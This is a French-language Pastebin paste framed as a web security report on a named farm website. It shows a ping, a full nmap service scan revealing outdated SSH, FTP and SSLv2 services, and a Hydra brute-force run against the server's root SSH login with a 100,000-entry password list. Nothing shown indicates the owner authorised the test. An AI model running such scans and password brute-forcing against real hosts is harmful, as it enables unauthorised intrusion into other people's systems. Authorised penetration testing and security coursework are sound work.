API tools faq
paste
Advertisement
Guest User

Arthur DOE - Compte Rendu de sécurité WEB

a guest
Sep 25th, 2018
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 12.30 KB | None | 0 0
raw download clone embed print report
  1. Pour le site fermeduchapiron.fr
  2.  
  3. Je remarque qu'il ne possède pas de certificat SSL, je décide donc de faire un ping afin de récupérer son IP :
  4. darto@invictus:[~]: ping fermeduchapiron.fr
  5. PING fermeduchapiron.fr (188.165.224.172) 56(84) bytes of data.
  6. 64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=1 ttl=128 time=30.7 ms
  7. 64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=2 ttl=128 time=88.2 ms
  8. 64 bytes from ns212328.ip-188-165-224.eu (188.165.224.172): icmp_seq=3 ttl=128 time=185 ms
  9. ^C
  10. --- fermeduchapiron.fr ping statistics ---
  11. 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
  12. rtt min/avg/max/mdev = 30.762/101.353/185.052/63.667 ms
  13.  
  14. Ensuite je fais un nmap afin de voir quels ports et services sont exposés :
  15.  
  16. darto@invictus:[~]: sudo nmap -A -v sV -O 188.165.224.172
  17. Starting Nmap 6.47 ( http://nmap.org ) at 2018-09-25 11:45 CEST
  18. NSE: Loaded 118 scripts for scanning.
  19. NSE: Script Pre-scanning.
  20. Failed to resolve "sV".
  21. Initiating Ping Scan at 11:45
  22. Scanning 188.165.224.172 [4 ports]
  23. Completed Ping Scan at 11:45, 1.06s elapsed (1 total hosts)
  24. Initiating Parallel DNS resolution of 1 host. at 11:45
  25. Completed Parallel DNS resolution of 1 host. at 11:45, 0.24s elapsed
  26. Initiating SYN Stealth Scan at 11:45
  27. Scanning ns212328.ip-188-165-224.eu (188.165.224.172) [1000 ports]
  28. Discovered open port 110/tcp on 188.165.224.172
  29. Discovered open port 995/tcp on 188.165.224.172
  30. Discovered open port 25/tcp on 188.165.224.172
  31. Discovered open port 22/tcp on 188.165.224.172
  32. Discovered open port 53/tcp on 188.165.224.172
  33. Discovered open port 993/tcp on 188.165.224.172
  34. Discovered open port 21/tcp on 188.165.224.172
  35. Discovered open port 143/tcp on 188.165.224.172
  36. Discovered open port 587/tcp on 188.165.224.172
  37. Discovered open port 443/tcp on 188.165.224.172
  38. Discovered open port 80/tcp on 188.165.224.172
  39. SYN Stealth Scan Timing: About 26.72% done; ETC: 11:47 (0:01:25 remaining)
  40. Discovered open port 106/tcp on 188.165.224.172
  41. Discovered open port 465/tcp on 188.165.224.172
  42. SYN Stealth Scan Timing: About 56.27% done; ETC: 11:47 (0:01:10 remaining)
  43. Discovered open port 8443/tcp on 188.165.224.172
  44. SYN Stealth Scan Timing: About 70.38% done; ETC: 11:48 (0:00:54 remaining)
  45. SYN Stealth Scan Timing: About 81.45% done; ETC: 11:48 (0:00:36 remaining)
  46. Completed SYN Stealth Scan at 11:48, 204.19s elapsed (1000 total ports)
  47. Initiating Service scan at 11:48
  48. Scanning 14 services on ns212328.ip-188-165-224.eu (188.165.224.172)
  49. Completed Service scan at 11:48, 19.66s elapsed (14 services on 1 host)
  50. Initiating OS detection (try #1) against ns212328.ip-188-165-224.eu (188.165.224.172)
  51. Retrying OS detection (try #2) against ns212328.ip-188-165-224.eu (188.165.224.172)
  52. Initiating Traceroute at 11:49
  53. Completed Traceroute at 11:49, 0.02s elapsed
  54. Initiating Parallel DNS resolution of 2 hosts. at 11:49
  55. Completed Parallel DNS resolution of 2 hosts. at 11:49, 0.06s elapsed
  56. NSE: Script scanning 188.165.224.172.
  57. Initiating NSE at 11:49
  58. Completed NSE at 11:51, 150.69s elapsed
  59. Nmap scan report for ns212328.ip-188-165-224.eu (188.165.224.172)
  60. Host is up (0.044s latency).
  61. Not shown: 984 closed ports
  62. PORT     STATE    SERVICE      VERSION
  63. 21/tcp   open     ftp          ProFTPD 1.3.4c
  64. | ssl-cert: Subject: commonName=sciweb.fr
  65. | Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
  66. | Public Key type: rsa
  67. | Public Key bits: 2048
  68. | Not valid before: 2016-02-24T20:12:37+00:00
  69. | Not valid after:  2019-02-24T20:12:37+00:00
  70. | MD5:   3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
  71. |_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
  72. |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
  73. 22/tcp   open     ssh          OpenSSH 5.3 (protocol 2.0)
  74. | ssh-hostkey:
  75. |   1024 bf:8f:de:e6:cb:61:b3:3f:92:6d:25:49:05:10:e2:b7 (DSA)
  76. |_  2048 73:6e:1b:44:49:ca:62:6f:8c:f6:d1:6a:36:17:12:17 (RSA)
  77. 25/tcp   open     smtp         Postfix smtpd
  78. |_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
  79. | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  80. | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  81. | Public Key type: rsa
  82. | Public Key bits: 1024
  83. | Not valid before: 2014-01-22T19:02:55+00:00
  84. | Not valid after:  2016-01-22T19:02:55+00:00
  85. | MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
  86. |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
  87. |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
  88. 53/tcp   open     domain       ISC BIND none
  89. | dns-nsid:
  90. |_  bind.version: none
  91. 80/tcp   open     http         nginx
  92. |_http-favicon: Parallels Control Panel
  93. |_http-methods: GET HEAD POST OPTIONS
  94. |_http-title: Default Parallels Plesk Panel Page
  95. 106/tcp  open     pop3pw       poppassd
  96. 110/tcp  open     pop3         Courier pop3d
  97. |_pop3-capabilities: PIPELINING SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN) TOP STLS USER LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) APOP UIDL
  98. 143/tcp  open     imap         Courier Imapd (released 2011)
  99. |_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN ACL2=UNION CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 UIDPLUS NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 OK CHILDREN THREAD=REFERENCES QUOTA STARTTLSA0001
  100. 443/tcp  open     http         nginx
  101. |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
  102. |_http-title: 400 The plain HTTP request was sent to HTTPS port
  103. | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
  104. | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
  105. | Public Key type: rsa
  106. | Public Key bits: 2048
  107. | Not valid before: 2014-01-22T19:05:41+00:00
  108. | Not valid after:  2015-01-22T19:05:41+00:00
  109. | MD5:   fe25 5bcf 00a6 3558 8231 1aed 2145 b67b
  110. |_SHA-1: bcb0 1091 a602 c3f3 1661 a989 b6e3 1a4a 2040 3d71
  111. |_ssl-date: 2018-09-25T09:49:23+00:00; +7s from local time.
  112. | sslv2:
  113. |   SSLv2 supported
  114. |_  ciphers: none
  115. 445/tcp  filtered microsoft-ds
  116. 465/tcp  open     ssl/smtp     Postfix smtpd
  117. |_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, AUTH DIGEST-MD5 LOGIN PLAIN CRAM-MD5, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
  118. | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  119. | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  120. | Public Key type: rsa
  121. | Public Key bits: 1024
  122. | Not valid before: 2014-01-22T19:02:55+00:00
  123. | Not valid after:  2016-01-22T19:02:55+00:00
  124. | MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
  125. |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
  126. 514/tcp  filtered shell
  127. 587/tcp  open     smtp         Postfix smtpd
  128. |_smtp-commands: sciweb.fr, PIPELINING, SIZE 10240000, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
  129. | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  130. | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  131. | Public Key type: rsa
  132. | Public Key bits: 1024
  133. | Not valid before: 2014-01-22T19:02:55+00:00
  134. | Not valid after:  2016-01-22T19:02:55+00:00
  135. | MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
  136. |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
  137. |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
  138. 993/tcp  open     ssl/imap     Courier Imapd (released 2011)
  139. |_imap-capabilities: IDLE THREAD=ORDEREDSUBJECT AUTH=PLAIN CAPABILITY IMAP4rev1 SORT AUTH=CRAM-MD5 ACL2=UNIONA0001 NAMESPACE completed ACL AUTH=CRAM-SHA256 AUTH=CRAM-SHA1 UIDPLUS OK THREAD=REFERENCES QUOTA CHILDREN
  140. | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  141. | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  142. | Public Key type: rsa
  143. | Public Key bits: 1024
  144. | Not valid before: 2014-01-22T19:02:55+00:00
  145. | Not valid after:  2016-01-22T19:02:55+00:00
  146. | MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
  147. |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
  148. | sslv2:
  149. |   SSLv2 supported
  150. |   ciphers:
  151. |_    SSL2_DES_192_EDE3_CBC_WITH_MD5
  152. 995/tcp  open     ssl/pop3     Courier pop3d
  153. |_pop3-capabilities: APOP IMPLEMENTATION(Courier Mail Server) USER SASL(LOGIN PLAIN) TOP UIDL PIPELINING LOGIN-DELAY(10)
  154. | ssl-cert: Subject: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  155. | Issuer: commonName=ns212328.ip-188-165-224.eu/organizationName=OVH/stateOrProvinceName=France/countryName=--
  156. | Public Key type: rsa
  157. | Public Key bits: 1024
  158. | Not valid before: 2014-01-22T19:02:55+00:00
  159. | Not valid after:  2016-01-22T19:02:55+00:00
  160. | MD5:   8870 1b15 5612 f069 aeb6 d0dd 8314 75e0
  161. |_SHA-1: f2ea 4aae 5a6a 31d5 1691 c63c 3056 5fe4 e4e9 3311
  162. | sslv2:
  163. |   SSLv2 supported
  164. |   ciphers:
  165. |_    SSL2_DES_192_EDE3_CBC_WITH_MD5
  166. 8443/tcp open     http         nginx
  167. |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
  168. |_http-title: 400 The plain HTTP request was sent to HTTPS port
  169. | ssl-cert: Subject: commonName=sciweb.fr
  170. | Issuer: commonName=WoSign CA Free SSL Certificate G2/organizationName=WoSign CA Limited/countryName=CN
  171. | Public Key type: rsa
  172. | Public Key bits: 2048
  173. | Not valid before: 2016-02-24T20:12:37+00:00
  174. | Not valid after:  2019-02-24T20:12:37+00:00
  175. | MD5:   3917 cdbb 33fc 0c05 68a9 e959 465c 6afd
  176. |_SHA-1: e343 5003 0f28 d773 f9c1 e96b 3deb aa8d fcf9 40ab
  177. |_ssl-date: 2018-09-25T09:49:22+00:00; +7s from local time.
  178. Device type: general purpose|storage-misc|VoIP phone
  179. Running (JUST GUESSING): Linux 2.4.X|3.X (98%), Microsoft Windows 7|XP (96%), BlueArc embedded (91%), Pirelli embedded (88%)
  180. OS CPE: cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7:::enterprise cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100 cpe:/h:pirelli:dp-10
  181. Aggressive OS guesses: DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (98%), Microsoft Windows 7 Enterprise (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%), Pirelli DP-10 VoIP phone (88%)
  182. No exact OS matches for host (test conditions non-ideal).
  183. Network Distance: 2 hops
  184. TCP Sequence Prediction: Difficulty=261 (Good luck!)
  185. IP ID Sequence Generation: Incremental
  186. Service Info: Hosts:  sciweb.fr, localhost.localdomain; OS: Unix
  187.  
  188. TRACEROUTE (using port 80/tcp)
  189. HOP RTT     ADDRESS
  190. 1   0.12 ms 192.168.23.2
  191. 2   0.10 ms ns212328.ip-188-165-224.eu (188.165.224.172)
  192.  
  193. NSE: Script Post-scanning.
  194. Initiating NSE at 11:51
  195. Completed NSE at 11:51, 0.00s elapsed
  196. Read data files from: /usr/bin/../share/nmap
  197. OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  198. Nmap done: 1 IP address (1 host up) scanned in 403.58 seconds
  199.           Raw packets sent: 1275 (59.332KB) | Rcvd: 1244 (50.404KB)
  200.  
  201. Je remarque que le port 22 est ouvert, et qu'il est donc possible de se connecter en SSH. Le login via root directement est possible et je lance donc un bruteforce afin de trouver un mot de passe :
  202. darto@invictus:[~]: hydra -l root -P passwd.txt -t 10 -w 2 -s 22 -f 188.165.224.172 ssh
  203. Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
  204.  
  205. [WARNING] the waittime you set is low, this can result in errornous results
  206. Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-25 11:34:19
  207. [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
  208. [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
  209. [DATA] max 10 tasks per 1 server, overall 10 tasks, 100083 login tries (l:1/p:100083), ~1000 tries per task
  210. [DATA] attacking service ssh on port 22
  211. [STATUS] 100.00 tries/min, 100 tries in 00:01h, 99983 todo in 16:40h, 10 active
  212. [STATUS] 73.33 tries/min, 220 tries in 00:03h, 99863 todo in 22:42h, 10 active
  213. [STATUS] 65.71 tries/min, 460 tries in 00:07h, 99623 todo in 25:17h, 10 active
  214. [STATUS] 62.67 tries/min, 940 tries in 00:15h, 99143 todo in 26:23h, 10 active
  215.  
  216.  
  217. Bisous
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!